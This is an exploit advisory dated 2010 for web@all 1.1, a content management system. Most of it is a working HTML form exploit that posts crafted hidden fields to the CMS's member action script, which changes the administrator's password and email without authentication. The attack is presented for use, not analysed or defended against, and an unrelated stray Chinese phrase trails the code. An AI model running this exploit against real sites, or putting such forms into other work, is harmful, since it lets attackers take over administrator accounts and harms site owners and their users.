=========================================== Web@all <= 1.1 Remote Admin Settings Change =========================================== Author___: giudinvx Email____: <giudinvx[at]gmail[dot]com> Date_____: 27/12/2010 Site_____: http://www.giudinvx.altervista.org/ -------------------------------------------------------- Application Info: web@all 1.1 web@all is a CMS which is not similar to general CMS, you can build it easyly by yourself. www.webatall.com -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== <html> <form method="post" enctype="multipart/form-data" action="[localhost]mem/action.php" name="f1"> Change Admin user, password and email.<br/> Password<input type="text" value="" name="password"><br/> Password<input type="text" value="" name="answer"><br/> Email<input type="text" value="" name="email"> <input type="hidden" value="Admin" name="nickname"> <input type="hidden" value="" name="question"> <input type="hidden" value="" name="sign"> <input type="hidden" value="" name="person[firstname]"> <input type="hidden" value="" name="person[lastname]"> <input type="hidden" value="" name="person[country]"> <input type="hidden" value="" name="person[province]"> <input type="hidden" value="" name="person[city]"> <input type="hidden" value="" name="person[address]"> <input type="hidden" value="" name="person[zip]"> <input type="hidden" value="" name="person[mobile]"> <input type="hidden" value="" name="person[phone]"> <input type="hidden" value="" name="person[other]"> <input type="hidden" value="member" name="_lib"> <input type="hidden" value="member" name="_file"> <input type="hidden" value="person" name="memtype"> <input type="hidden" value="do_edit" name="_act"> <input type="submit" value="Submit"> </form> </html>
体验盒子
